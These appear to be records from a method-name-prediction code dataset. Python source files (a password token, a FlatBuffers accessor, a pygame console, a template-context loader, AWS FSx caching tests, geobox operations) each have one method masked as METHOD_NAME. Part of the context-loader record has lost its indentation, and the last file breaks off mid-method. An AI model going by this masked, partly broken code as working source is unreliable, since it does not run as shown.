        :raises: otpkey contains the password and is required therefore
                 otherewise raises ParameterError
        """
        if "otpkey" not in param:
            raise ParameterError("Missing Parameter 'otpkey'!")
        TokenClass.update(self, param)
        # The otp length of a password token is the password length.
        TokenClass.setOtpLen(self, len(param["otpkey"]))

    def setOtpKey(self, otpKey, reset_failcount=True):
        """
        the seed / secret for the password token contains the unix hashed
        (hmac256) format of the password. the iv is used as indicator that
        we are using the new format, which is the ':1:' indicator

        :param otpKey: the token seed / secret
        :param reset_failcount: boolean, if the failcounter should be reseted
        """
        password_hash = utils.crypt_password(otpKey).encode("utf-8")
        self.token.set_encrypted_seed(
            password_hash, b":1:", reset_failcount=reset_failcount
        )

    def validate_seed(self, seed):
        """
        Accepts every seed because password token has no restrictions.
        This overrides the hmactoken's seed validation (only hex).

        :param seed: a string that should be checked for
                     validity as a seed (aka otpkey)
        """
        pass

    def checkOtp(self, anOtpVal, counter, window, options=None):
        """
        checks the static password - using the secret object password
        comparison method

        :param anOtpVal: the password to be compared
        :param counter: - not used for the password token -
        :param window: - not used for the password token -
        :param options: - not used for the password token -

        :return: counter, which is 0 for success and -1 for failure
        """
        secObj = self._get_secret_object()
        if secObj.compare_password(anOtpVal):
            return 0
        return -1

    def check_otp_exist(self, otp, window=10, user=None, autoassign=False):
        """Check whether the given otp matches this token's static password.

        window/user/autoassign are accepted for interface compatibility only.
        """
        return self.checkOtp(otp, counter=None, window=None)

# eof #
298,425 | sub graph add name | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: onert_tflite
import flatbuffers
class SubGraph(object):
    """Generated read-only accessor for the flatbuffers ``SubGraph`` table.

    Generated by the FlatBuffers compiler -- do not edit by hand.
    Vtable slots: 4=tensors, 6=inputs, 8=outputs, 10=operators, 12=name.
    """
    __slots__ = ['_tab']

    @classmethod
    def GetRootAsSubGraph(cls, buf, offset):
        # The root table offset is stored at the start of the buffer.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = SubGraph()
        x.Init(buf, n + offset)
        return x

    # SubGraph
    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)

    # SubGraph: j-th Tensor sub-table, or None when the vector is absent.
    def Tensors(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            x = self._tab.Vector(o)
            x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
            x = self._tab.Indirect(x)
            from .Tensor import Tensor
            obj = Tensor()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # SubGraph
    def TensorsLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0

    # SubGraph: j-th input tensor index (int32), 0 when the vector is absent.
    def Inputs(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            a = self._tab.Vector(o)
            return self._tab.Get(
                flatbuffers.number_types.Int32Flags,
                a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 4))
        return 0

    # SubGraph
    def InputsAsNumpy(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Int32Flags, o)
        return 0

    # SubGraph
    def InputsLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0

    # SubGraph: j-th output tensor index (int32), 0 when the vector is absent.
    def Outputs(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            a = self._tab.Vector(o)
            return self._tab.Get(
                flatbuffers.number_types.Int32Flags,
                a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 4))
        return 0

    # SubGraph
    def OutputsAsNumpy(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Int32Flags, o)
        return 0

    # SubGraph
    def OutputsLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0

    # SubGraph: j-th Operator sub-table, or None when the vector is absent.
    def Operators(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            x = self._tab.Vector(o)
            x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
            x = self._tab.Indirect(x)
            from .Operator import Operator
            obj = Operator()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None

    # SubGraph
    def OperatorsLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0

    # SubGraph: optional name string, or None when absent.
    def Name(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None
# Generated builder helpers for writing a SubGraph table.
# Slot numbers below correspond to vtable slots 4/6/8/10/12 of the reader above.

def SubGraphStart(builder):
    # Begin a SubGraph table with 5 vtable slots.
    builder.StartObject(5)

def SubGraphAddTensors(builder, tensors):
    # Slot 0: offset of the tensors vector.
    builder.PrependUOffsetTRelativeSlot(
        0, flatbuffers.number_types.UOffsetTFlags.py_type(tensors), 0)

def SubGraphStartTensorsVector(builder, numElems):
    return builder.StartVector(4, numElems, 4)

def SubGraphAddInputs(builder, inputs):
    # Slot 1: offset of the inputs (int32) vector.
    builder.PrependUOffsetTRelativeSlot(
        1, flatbuffers.number_types.UOffsetTFlags.py_type(inputs), 0)

def SubGraphStartInputsVector(builder, numElems):
    return builder.StartVector(4, numElems, 4)

def SubGraphAddOutputs(builder, outputs):
    # Slot 2: offset of the outputs (int32) vector.
    builder.PrependUOffsetTRelativeSlot(
        2, flatbuffers.number_types.UOffsetTFlags.py_type(outputs), 0)

def SubGraphStartOutputsVector(builder, numElems):
    return builder.StartVector(4, numElems, 4)

def SubGraphAddOperators(builder, operators):
    # Slot 3: offset of the operators vector.
    builder.PrependUOffsetTRelativeSlot(
        3, flatbuffers.number_types.UOffsetTFlags.py_type(operators), 0)

def SubGraphStartOperatorsVector(builder, numElems):
    return builder.StartVector(4, numElems, 4)

def METHOD_NAME(builder, name):
    # Slot 4: offset of the name string.
    builder.PrependUOffsetTRelativeSlot(
        4, flatbuffers.number_types.UOffsetTFlags.py_type(name), 0)

def SubGraphEnd(builder):
    return builder.EndObject()
298,426 | scroll | import pygame as pg
from .fastfont import Fastfont
black = (0, 0, 0)
white = (255,255,255)
darkgrey = (25, 25, 48)
grey = (84, 84, 114)
darkblue = (25, 25, 64, 100)
white = (255, 255, 255)
green = (0, 255, 0)
blue = (0, 0, 255)
red = (255, 0, 0)
lightgreyblue = (130, 150, 190) # waypoint symbol color
lightgreygreen = (149, 215, 179) # grid color
lightcyan = (0, 255, 255) # FIR boundaries
amber = (255,163,71) # Conflicting aircraft
magenta = (255,0,255) # Used for route
class Console:
    """
    Console (aka EditWin) class definition : Edit window & console class

    The window is a grid of nlin lines x nch characters. Cursor positions are
    kept as linear indices (line * nch + column): xcursor is the insertion
    point, xedit is the start of the user-editable region; when they are equal
    no user edit is in progress.

    Methods:
        echo(msg)       : Print a message
        insert(message) : insert characters in current edit line
        backspace()     : process backspace
        getline()       : return current edit line
        enter()         : enter, end of edit line
        scroll()        : scroll up one line
        update()        : redraw update bitmap of edit window

    Created by  : Jacco M. Hoekstra (TU Delft)
    """

    def __init__(self, win, nch, nlin, winx, winy):
        # Was Helvetica,14
        self.fontedit = Fastfont(win, 'Courier New', 14, white, False, False)  # name, size, bold, italic

        # Edit window: nlin lines of nch chars each
        self.content = []
        self.nch = nch      # number of chars per line
        self.nlin = nlin    # number of lines in windows
        self.winx = winx    # x-coordinate in pixels of left side
        self.winy = winy - self.nlin * self.fontedit.linedy  # y-coordinate in pixels of top
        self.msg = []       # Messages in edit window

        for i in range(self.nlin):
            line = self.nch * [' ']
            self.content.append(line)

        # NOTE(review): this aliases content rather than snapshotting it, so
        # the per-character comparison in update() is always False; update()
        # compensates with "if True or ...". Confirm before "fixing" either.
        self.content0 = self.content

        self.xcursor = 0  # linear index of the cursor
        self.xedit = 0    # linear index of the start of the editable region

        # self.printeditwin('Testing 1,2,3')

        # Backing bitmap; width guessed from a max glyph aspect ratio of 10/17.
        self.bmpdy = self.nlin * self.fontedit.linedy
        self.bmpdx = int(self.nch * self.fontedit.linedy * 10 / 17) + 2  # Guess max aspect ratio
        self.bmp = pg.Surface([self.bmpdx, self.bmpdy],
                              pg.SRCALPHA, 32)
        self.bmp.fill(darkblue)
        self.rect = pg.Rect(self.winx, self.winy,
                            self.bmpdx, self.bmpdy)
        self.redraw = True
        return

    def echo(self, msg):
        """print a message to console window"""
        if self.xedit == self.xcursor:
            # No user edit in progress: print directly on its own line
            self.insert(msg)
            j = int(self.xcursor / self.nch)
            self.xcursor = (j + 1) * self.nch
            self.xedit = self.xcursor

            # Check for End of window
            if self.xedit >= (self.nch - 1) * (self.nlin - 1):
                del self.content[0]
                self.content.append(self.nch * [' '])
                self.xcursor = j * self.nch
                self.xedit = self.xcursor
        else:
            # User is typing: buffer the message until enter() flushes it
            self.msg.append(msg)  # buffer
        return

    def insert(self, message):
        """Insert characters at the cursor, wrapping lines and scrolling."""
        i = self.xcursor % self.nch
        j = int(self.xcursor / self.nch)
        for ich in range(len(message)):
            self.content[j][i] = message[ich]
            i = i + 1
            # Check for end-of line
            if i >= self.nch:
                i = 0
                j = j + 1
                # Check for end-of edit window
                if j >= self.nlin:
                    self.METHOD_NAME()
                    j = j - 1
        self.xcursor = j * self.nch + i
        self.redraw = True
        return

    def backspace(self):
        """Erase the character before the cursor (never past xedit)."""
        if self.xcursor > self.xedit:
            self.xcursor = self.xcursor - 1
            self.redraw = True
            i = self.xcursor % self.nch
            j = int(self.xcursor / self.nch)
            self.content[j][i] = " "
        return

    def getline(self):  # enter was pressed so we need current command line
        """Return the text between xedit and the cursor as a string."""
        line = ""
        for idx in range(self.xedit, self.xcursor):
            i = idx % self.nch
            j = int(idx / self.nch)
            line = line + self.content[j][i]
        return line

    def enter(self):
        """Finish the current edit line, then flush buffered echo messages."""
        j = int(self.xcursor / self.nch)
        self.xcursor = (j + 1) * self.nch
        self.xedit = self.xcursor

        # End of window
        if self.xedit >= (self.nch - 1) * (self.nlin - 1):
            del self.content[0]
            self.content.append(self.nch * [' '])
            self.xcursor = j * self.nch
            self.xedit = self.xcursor

        # Print buffered messages
        self.redraw = True
        while len(self.msg) > 0:
            self.echo(self.msg[0])  # No endless recursion because xedit==xcursor
            del self.msg[0]
        return

    def METHOD_NAME(self):
        """Scroll window"""
        del self.content[0]
        self.content.append(self.nch * [' '])
        self.xcursor = self.xcursor - self.nch
        self.xedit = self.xedit - self.nch

    def update(self):
        """Update: Draw a new frame"""
        # Draw edit window
        if self.redraw:
            self.bmp.fill(darkgrey)
            for j in range(self.nlin):
                for i in range(self.nch):
                    # "if True or" forces a full repaint; the dirty-cell check
                    # is dead because content0 aliases content (see __init__).
                    if True or self.content[j][i] != self.content0[j][i]:
                        x = i * int(self.fontedit.linedy * 10 / 17) + 1
                        y = j * self.fontedit.linedy + int(self.fontedit.linedy / 6)
                        self.fontedit.printat(self.bmp,
                                              x, y,
                                              self.content[j][i])
                        self.content0[j][i] = self.content[j][i]

            # Draw cursor
            i = self.xcursor % self.nch
            j = int(self.xcursor / self.nch)
            x = i * int(self.fontedit.linedy * 10 / 17)
            y = j * self.fontedit.linedy + int(self.fontedit.linedy / 6)
            self.fontedit.printat(self.bmp, x, y, "_")

            self.bmp.set_alpha(127)
            self.redraw = False
        return
298,427 | update with override context | import os
import json
import logging
import copy
from postgresqleu.util.context_processors import settings_context
try:
import yaml
_has_yaml = True
except ImportError:
_has_yaml = False
# XXX: keep in sync with deploystatic.py!
def deep_update_context(target, source):
    """Recursively merge *source* into *target*, in place.

    Dict values are merged key by key; any other value is shallow-copied in,
    and a dict from *source* replaces (as a detached deep copy) anything in
    *target* that is missing or not a dict. Uses exact ``type(...) == dict``
    checks on purpose, matching deploystatic.py.
    """
    for key, value in source.items():
        if type(value) != dict:
            # Plain value: a shallow copy wins outright
            target[key] = copy.copy(value)
        elif key in target and type(target[key]) == dict:
            # Both sides are dicts: merge recursively
            deep_update_context(target[key], value)
        else:
            # Target slot missing or not a dict: take a detached deep copy
            target[key] = copy.deepcopy(value)
def _load_context_file(filename, ignore_exceptions=True):
try:
with open(filename, encoding='utf8') as f:
if filename.endswith('.json'):
return json.load(f)
else:
return yaml.safe_load(f)
except ValueError as e:
# Malformatted JSON -- pass it through as an exception
raise
except Exception:
if not ignore_exceptions:
raise
return {}
def load_base_context(rootdir):
    """Load the base template context for *rootdir*.

    Reads templates/context.json first and then, when yaml support is
    available, layers templates/context.yaml on top of it.
    """
    context = {}
    candidates = [os.path.join(rootdir, 'templates/context.json')]
    if _has_yaml:
        candidates.append(os.path.join(rootdir, 'templates/context.yaml'))
    for filename in candidates:
        if os.path.isfile(filename):
            deep_update_context(context, _load_context_file(filename))
    return context
def load_override_context(rootdir):
    """Load and merge all context files from templates/context.override.d.

    Files are applied in sorted name order; a file that fails to parse is
    logged and skipped rather than aborting the whole load.
    """
    context = {}
    overridedir = os.path.join(rootdir, 'templates/context.override.d')
    if not os.path.isdir(overridedir):
        return context

    for fn in sorted(os.listdir(overridedir)):
        if not (fn.endswith('.json') or (_has_yaml and fn.endswith('.yaml'))):
            continue
        fullpath = os.path.join(overridedir, fn)
        try:
            deep_update_context(context, _load_context_file(fullpath, False))
        except Exception as e:
            logging.getLogger(__name__).warning(
                'Failed to load context file {}: {}'.format(fullpath, e)
            )
    return context
def METHOD_NAME(context, rootdir):
    """Layer the override context from *rootdir* onto *context*, in place."""
    overrides = load_override_context(rootdir)
    deep_update_context(context, overrides)
# Locate the git revision for a repository in the given path, including
# walking up the tree to find it if the specified path is not the root.
def find_git_revision(path):
    """Return the abbreviated (7-char) git revision governing *path*.

    Walks up from *path* towards the filesystem root, looking at each level
    for either a .git checkout or a .deploystatic_githash marker written by
    deploystatic.

    :returns: the 7-character revision string, or None when nothing is found
              or the repository state cannot be resolved (e.g. detached HEAD,
              packed refs).
    """
    while True:
        headfile = os.path.join(path, ".git/HEAD")
        hashfile = os.path.join(path, ".deploystatic_githash")
        if os.path.exists(headfile):
            # Found a git checkout
            with open(headfile) as f:
                ref = f.readline().strip()
            if not ref.startswith('ref: refs/heads/'):
                # Detached HEAD or unexpected format -- give up
                return None
            refname = os.path.join(path, ".git/", ref[5:])
            if not os.path.isfile(refname):
                # Ref not stored loose (e.g. packed-refs) -- give up
                return None
            with open(refname) as f:
                fullref = f.readline()
            return fullref[:7]
        elif os.path.exists(hashfile):
            # Marker left behind by a deploystatic deployment
            with open(hashfile) as f:
                return f.readline().strip()

        # Step up one level, stopping when dirname() makes no more progress.
        # (The previous `while path != '/'` guard looped forever on relative
        # paths -- os.path.dirname('') == '' -- and on Windows drive roots,
        # which never compare equal to '/'.)
        parent = os.path.dirname(path)
        if parent == path:
            return None
        path = parent
def load_all_context(conference, inject, dictionary=None):
    """Assemble the full template context for a conference page.

    Merge order (later wins): base context from the conference jinjadir,
    the *inject* dict, the git revision, the optional *dictionary*, the
    override context directory, and finally the global settings context.
    """
    if conference and conference.jinjaenabled and conference.jinjadir:
        try:
            c = load_base_context(conference.jinjadir)
        except ValueError as e:
            # NOTE(review): HttpResponse is not imported in this module, so
            # this error path raises NameError instead of returning a response
            # -- and returning an HttpResponse from a context loader looks
            # wrong for non-view callers anyway. Confirm intent and either
            # add the django import or re-raise here.
            return HttpResponse("JSON parse failed: {0}".format(e), content_type="text/plain")
    else:
        c = {}

    c.update(inject)
    if conference and conference.jinjaenabled and conference.jinjadir:
        c['githash'] = find_git_revision(conference.jinjadir)

    if dictionary:
        c.update(dictionary)
    if conference and conference.jinjaenabled and conference.jinjadir:
        # Overrides are applied last-but-one so they beat everything except
        # the global settings context.
        METHOD_NAME(c, conference.jinjadir)
    c.update(settings_context())

    return c
298,428 | test describe volumes | # Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from assertpy import assert_that
from pcluster.aws.aws_api import AWSApi
from tests.utils import MockedBoto3Request
@pytest.fixture()
def boto3_stubber_path():
    """Tell the boto3_stubber fixture which module attribute to patch."""
    return "pcluster.aws.common.boto3"
def get_describe_file_systems_mocked_request(fsxs, lifecycle):
    """Build the stubbed describe_file_systems request/response pair,
    reporting every given file-system id with the same *lifecycle*."""
    file_systems = [{"FileSystemId": fsx_id, "Lifecycle": lifecycle} for fsx_id in fsxs]
    return MockedBoto3Request(
        method="describe_file_systems",
        response={"FileSystems": file_systems},
        expected_params={"FileSystemIds": fsxs},
    )
def test_get_file_systems_info(boto3_stubber):
    """Verify that FsxClient.get_file_systems_info caches results per file system."""
    fsx = "fs-12345678"
    additional_fsx = "fs-23456789"
    # The first mocked request and the third are about the same fsx. However, the lifecycle of the fsx changes
    # from CREATING to AVAILABLE. The second mocked request is about another fsx
    mocked_requests = [
        get_describe_file_systems_mocked_request([fsx], "CREATING"),
        get_describe_file_systems_mocked_request([additional_fsx], "CREATING"),
        get_describe_file_systems_mocked_request([fsx], "AVAILABLE"),
    ]
    boto3_stubber("fsx", mocked_requests)
    assert_that(AWSApi.instance().fsx.get_file_systems_info([fsx])[0].file_storage_info["Lifecycle"]).is_equal_to(
        "CREATING"
    )
    # Second boto3 call with more fsxs. The fsx already cached should not be included in the boto3 call.
    response = AWSApi.instance().fsx.get_file_systems_info([fsx, additional_fsx])
    assert_that(response).is_length(2)
    # Third boto3 call. The result should be from cache even if the lifecycle of the fsx is different
    assert_that(AWSApi.instance().fsx.get_file_systems_info([fsx])[0].file_storage_info["Lifecycle"]).is_equal_to(
        "CREATING"
    )
    # Fourth boto3 call after resetting the AWSApi instance. The latest fsx lifecycle should be retrieved from boto3
    AWSApi.reset()
    assert_that(AWSApi.instance().fsx.get_file_systems_info([fsx])[0].file_storage_info["Lifecycle"]).is_equal_to(
        "AVAILABLE"
    )
def get_describe_storage_virtual_machines_mocked_request(svms, lifecycle):
    """Build the stubbed describe_storage_virtual_machines request/response
    pair, reporting every given SVM id with the same *lifecycle*."""
    machines = [{"StorageVirtualMachineId": svm_id, "Lifecycle": lifecycle} for svm_id in svms]
    return MockedBoto3Request(
        method="describe_storage_virtual_machines",
        response={"StorageVirtualMachines": machines},
        expected_params={"StorageVirtualMachineIds": svms},
    )
def test_describe_storage_virtual_machines(boto3_stubber):
    """Verify that FsxClient.describe_storage_virtual_machines caches per-SVM results."""
    svm = "svm-12345678901234567"
    additional_svm = "svm-23456789012345678"
    # The first mocked request and the third are about the same SVM. However, the lifecycle of the fsx changes
    # from CREATING to CREATED. The second mocked request is about another SVM
    mocked_requests = [
        get_describe_storage_virtual_machines_mocked_request([svm], "CREATING"),
        get_describe_storage_virtual_machines_mocked_request([additional_svm], "CREATING"),
        get_describe_storage_virtual_machines_mocked_request([svm], "CREATED"),
    ]
    boto3_stubber("fsx", mocked_requests)
    assert_that(AWSApi.instance().fsx.describe_storage_virtual_machines([svm])[0]["Lifecycle"]).is_equal_to("CREATING")
    # Second boto3 call with more SVMs. The SVM already cached should not be included in the boto3 call.
    response = AWSApi.instance().fsx.describe_storage_virtual_machines([svm, additional_svm])
    assert_that(response).is_length(2)
    # Third boto3 call. The result should be from cache even if the lifecycle of the SVM is different
    assert_that(AWSApi.instance().fsx.describe_storage_virtual_machines([svm])[0]["Lifecycle"]).is_equal_to("CREATING")
    # Fourth boto3 call after resetting the AWSApi instance. The latest fsx lifecycle should be retrieved from boto3
    AWSApi.reset()
    assert_that(AWSApi.instance().fsx.describe_storage_virtual_machines([svm])[0]["Lifecycle"]).is_equal_to("CREATED")
def get_describe_volumes_mocked_request(volumes, lifecycle):
    """Build the stubbed describe_volumes request/response pair, reporting
    every given volume id with the same *lifecycle*."""
    volume_entries = [{"VolumeId": volume_id, "Lifecycle": lifecycle} for volume_id in volumes]
    return MockedBoto3Request(
        method="describe_volumes",
        response={"Volumes": volume_entries},
        expected_params={"VolumeIds": volumes},
    )
def METHOD_NAME(boto3_stubber):
    """Verify that FsxClient.describe_volumes caches per-volume results."""
    volume = "fsvol-12345678901234567"
    additional_volume = "fsvol-23456789012345678"
    # The first mocked request and the third are about the same volume. However, the lifecycle of the fsx changes
    # from CREATING to CREATED. The second mocked request is about another volume
    mocked_requests = [
        get_describe_volumes_mocked_request([volume], "CREATING"),
        get_describe_volumes_mocked_request([additional_volume], "CREATING"),
        get_describe_volumes_mocked_request([volume], "CREATED"),
    ]
    boto3_stubber("fsx", mocked_requests)
    assert_that(AWSApi.instance().fsx.describe_volumes([volume])[0]["Lifecycle"]).is_equal_to("CREATING")
    # Second boto3 call with more volumes. The volume already cached should not be included in the boto3 call.
    response = AWSApi.instance().fsx.describe_volumes([volume, additional_volume])
    assert_that(response).is_length(2)
    # Third boto3 call. The result should be from cache even if the lifecycle of the SVM is different
    assert_that(AWSApi.instance().fsx.describe_volumes([volume])[0]["Lifecycle"]).is_equal_to("CREATING")
    # Fourth boto3 call after resetting the AWSApi instance. The latest fsx lifecycle should be retrieved from boto3
    AWSApi.reset()
    assert_that(AWSApi.instance().fsx.describe_volumes([volume])[0]["Lifecycle"]).is_equal_to("CREATED")
def get_describe_file_caches_mocked_request(file_cache_ids):
    """Build a MockedBoto3Request stubbing an FSx describe_file_caches call."""
    cache_entries = [{"FileCacheId": fc_id} for fc_id in file_cache_ids]
    return MockedBoto3Request(
        method="describe_file_caches",
        expected_params={"FileCacheIds": file_cache_ids},
        response={"FileCaches": cache_entries},
    )
def test_describe_file_caches(boto3_stubber):
    """Verify that FSx describe_file_caches results are cached per AWSApi instance."""
    file_cache_id = "fc-12345678"
    additional_file_cache_id = "fc-123456789012345678"
    # The first mocked request is to check that the data is cached. The second mocked request is about another FC
    mocked_requests = [
        get_describe_file_caches_mocked_request([file_cache_id]),
        get_describe_file_caches_mocked_request([additional_file_cache_id]),
    ]
    boto3_stubber("fsx", mocked_requests)
    AWSApi.instance().fsx.describe_file_caches([file_cache_id])
    # Second boto3 call with more FileCaches. The FC already cached should not be included in the boto3 call.
    assert_that(AWSApi.instance().fsx.fc_cache).contains(file_cache_id)
    assert_that(AWSApi.instance().fsx.fc_cache).does_not_contain(additional_file_cache_id)
    response = AWSApi.instance().fsx.describe_file_caches([file_cache_id, additional_file_cache_id])
    assert_that(AWSApi.instance().fsx.fc_cache).contains(file_cache_id, additional_file_cache_id)
    assert_that(response).is_length(2)
# This file is part of the Open Data Cube, see https://opendatacube.org for more information
#
# Copyright (c) 2015-2023 ODC Contributors
# SPDX-License-Identifier: Apache-2.0
""" Geometric operations on GeoBox class
"""
from typing import Dict, Optional, Tuple, Iterable
import itertools
import math
from affine import Affine
from . import Geometry, GeoBox, BoundingBox
from .tools import align_up
from datacube.utils.math import clamp
# pylint: disable=invalid-name
MaybeInt = Optional[int]
MaybeFloat = Optional[float]
def flipy(gbox: GeoBox) -> GeoBox:
    """
    :returns: GeoBox covering the same region but with Y-axis flipped
    """
    nrows, ncols = gbox.shape
    # Pixel-space flip: move origin to the bottom row, then negate Y.
    flip = Affine.translation(0, nrows) * Affine.scale(1, -1)
    return GeoBox(ncols, nrows, gbox.affine * flip, gbox.crs)
def flipx(gbox: GeoBox) -> GeoBox:
    """
    :returns: GeoBox covering the same region but with X-axis flipped
    """
    nrows, ncols = gbox.shape
    # Pixel-space flip: move origin to the last column, then negate X.
    flip = Affine.translation(ncols, 0) * Affine.scale(-1, 1)
    return GeoBox(ncols, nrows, gbox.affine * flip, gbox.crs)
def translate_pix(gbox: GeoBox, tx: float, ty: float) -> GeoBox:
    """
    Shift GeoBox in pixel plane. (0,0) of the new GeoBox will be at the same
    location as pixel (tx, ty) in the original GeoBox.
    """
    nrows, ncols = gbox.shape
    shifted = gbox.affine * Affine.translation(tx, ty)
    return GeoBox(ncols, nrows, shifted, gbox.crs)
def pad(gbox: GeoBox, padx: int, pady: MaybeInt = None) -> GeoBox:
    """
    Expand GeoBox by fixed number of pixels on each side.

    :param padx: pixels added on the left and on the right
    :param pady: pixels added on the top and on the bottom (defaults to ``padx``)
    """
    if pady is None:
        pady = padx
    nrows, ncols = gbox.shape
    shifted = gbox.affine * Affine.translation(-padx, -pady)
    return GeoBox(ncols + 2 * padx, nrows + 2 * pady, shifted, gbox.crs)
def pad_wh(gbox: GeoBox,
           alignx: int = 16,
           aligny: MaybeInt = None) -> GeoBox:
    """
    Expand GeoBox such that width and height are multiples of supplied number.

    :param alignx: width alignment (default 16)
    :param aligny: height alignment (defaults to ``alignx``)
    """
    if aligny is None:
        aligny = alignx
    nrows, ncols = gbox.shape
    return GeoBox(align_up(ncols, alignx),
                  align_up(nrows, aligny),
                  gbox.affine, gbox.crs)
def zoom_out(gbox: GeoBox, factor: float) -> GeoBox:
    """
    Change resolution of a GeoBox while covering the same region.

    factor > 1 --> smaller width/height, fewer but bigger pixels
    factor < 1 --> bigger width/height, more but smaller pixels

    :returns: GeoBox covering the same region but with bigger pixels (i.e. lower resolution)
    """
    # Use the module-level ``math`` import instead of a redundant
    # function-local ``from math import ceil`` (the module already imports math).
    H, W = (max(1, math.ceil(s/factor)) for s in gbox.shape)
    A = gbox.affine*Affine.scale(factor, factor)
    return GeoBox(W, H, A, gbox.crs)
def zoom_to(gbox: GeoBox, shape: Tuple[int, int]) -> GeoBox:
    """
    :returns: GeoBox covering the same region but with different number of pixels
              and therefore resolution.
    """
    nrows, ncols = gbox.shape
    new_nrows, new_ncols = shape
    # Scale pixel coordinates so the new grid spans the same footprint.
    scale = Affine.scale(ncols / float(new_ncols), nrows / float(new_nrows))
    return GeoBox(new_ncols, new_nrows, gbox.affine * scale, gbox.crs)
def rotate(gbox: GeoBox, deg: float) -> GeoBox:
    """
    Rotate GeoBox around the center.

    It's as if you stick a needle through the center of the GeoBox footprint
    and rotate it counter clock wise by supplied number of degrees.

    Note that from pixel point of view image rotates the other way. If you have
    source image with an arrow pointing right, and you rotate GeoBox 90 degree,
    in that view arrow should point down (this is assuming usual case of inverted
    y-axis)
    """
    nrows, ncols = gbox.shape
    # Footprint center in CRS coordinates serves as the pivot point.
    center = gbox.transform * (ncols * 0.5, nrows * 0.5)
    rotated = Affine.rotation(deg, center) * gbox.transform
    return GeoBox(ncols, nrows, rotated, gbox.crs)
def affine_transform_pix(gbox: GeoBox, transform: Affine) -> GeoBox:
    """
    Apply affine transform on pixel side.

    :param transform: Affine matrix mapping from new pixel coordinate space to
                      pixel coordinate space of input gbox

    :returns: GeoBox of the same pixel shape but covering different region,
              pixels in the output gbox relate to input geobox via `transform`

    X_old_pix = transform * X_new_pix
    """
    nrows, ncols = gbox.shape
    combined = gbox.affine * transform
    return GeoBox(ncols, nrows, combined, gbox.crs)
class GeoboxTiles():
    """ Partition GeoBox into sub geoboxes
    """

    def __init__(self, box: GeoBox, tile_shape: Tuple[int, int]):
        """ Construct from a ``GeoBox``

        :param box: source :class:`datacube.utils.geometry.GeoBox`
        :param tile_shape: Shape of sub-tiles in pixels (rows, cols)
        """
        self._gbox = box
        self._tile_shape = tile_shape
        # Number of tiles along each dimension; edge tiles may be partial.
        self._shape = tuple(math.ceil(float(N)/n)
                            for N, n in zip(box.shape, tile_shape))
        # Lazily-populated cache of tile-index -> sub-GeoBox.
        self._cache: Dict[Tuple[int, int], GeoBox] = {}

    @property
    def base(self) -> GeoBox:
        """Source GeoBox this tiling was constructed from."""
        return self._gbox

    @property
    def shape(self):
        """ Number of tiles along each dimension
        """
        return self._shape

    def _idx_to_slice(self, idx: Tuple[int, int]) -> Tuple[slice, slice]:
        """Convert a (row, col) tile index into a pair of pixel-space slices."""
        def _slice(i, N, n) -> slice:
            _in = i*n
            if 0 <= _in < N:
                return slice(_in, min(_in + n, N))
            else:
                # BUGFIX: added missing space before "is" so the message matches
                # the one raised by chunk_shape.
                raise IndexError("Index ({},{}) is out of range".format(*idx))

        ir, ic = (_slice(i, N, n)
                  for i, N, n in zip(idx, self._gbox.shape, self._tile_shape))
        return (ir, ic)

    def chunk_shape(self, idx: Tuple[int, int]) -> Tuple[int, int]:
        """ Chunk shape for a given chunk index.

        :param idx: (row, col) index
        :returns: (nrow, ncols) shape of a tile (edge tiles might be smaller)
        :raises: IndexError when index is outside of [(0,0) -> .shape)
        """
        def _sz(i: int, n: int, tile_sz: int, total_sz: int) -> int:
            if 0 <= i < n - 1:  # not edge tile
                return tile_sz
            elif i == n - 1:  # edge tile
                return total_sz - (i*tile_sz)
            else:  # out of index case
                raise IndexError("Index ({},{}) is out of range".format(*idx))

        n1, n2 = map(_sz, idx, self._shape, self._tile_shape, self._gbox.shape)
        return (n1, n2)

    def __getitem__(self, idx: Tuple[int, int]) -> GeoBox:
        """ Lookup tile by index, index is in matrix access order: (row, col)

        :param idx: (row, col) index
        :returns: GeoBox of a tile
        :raises: IndexError when index is outside of [(0,0) -> .shape)
        """
        sub_gbox = self._cache.get(idx, None)
        if sub_gbox is not None:
            return sub_gbox
        roi = self._idx_to_slice(idx)
        return self._cache.setdefault(idx, self._gbox[roi])

    def range_from_bbox(self, bbox: BoundingBox) -> Tuple[range, range]:
